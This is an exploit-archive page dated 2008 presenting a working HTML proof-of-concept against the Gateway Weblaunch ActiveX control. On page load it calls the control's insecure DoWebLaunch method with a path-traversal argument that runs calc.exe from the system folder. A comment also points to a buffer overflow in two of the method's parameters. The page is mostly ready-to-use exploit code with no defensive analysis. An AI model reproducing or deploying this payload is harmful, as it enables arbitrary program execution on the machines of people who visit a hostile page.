Gateway Weblaunch ActiveX Control Insecure Method Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Gateway Weblaunch ActiveX Control Insecure Method Exploit
# Published : 2008-01-08
# Author : Elazar
# Previous Title : Move Networks Quantum Streaming Player SEH Overwrite Exploit
# Next Title : Xtacacsd <= 4.1.2 report Buffer Overflow

<!-- 
Gateway Weblaunch ActiveX Control Insecure Method Exploit
Implemented Categories:
Category: Safe for Initialising
Category: Safe for Scripting
Written by e.b.
Tested on Windows XP SP2(fully patched) English, IE6, weblaunch.ocx version 1.0.0.1
This method is also vulnerable to a buffer overflow in the 2nd and 4th parameters
-->
<html>
 <head>
  <title>Gateway Weblaunch ActiveX Control Insecure Method Exploit</title>
  <script language="JavaScript" defer>
    function Check() {
     
                //escape from systemdrivedocuments and settingsusernamelocal settingstemp
		obj.DoWebLaunch("","..\..\..\..\windows\system32\calc.exe","","");
          
    } 
   
   </script>
  </head>
 <body onload="JavaScript: return Check();">
    <object id="obj" classid="clsid:93CEA8A4-6059-4E0B-ADDD-73848153DD5E" height="0" width="0">
     Unable to create object
    </object>
 </body>
</html>

# www.Syue.com [2008-01-08]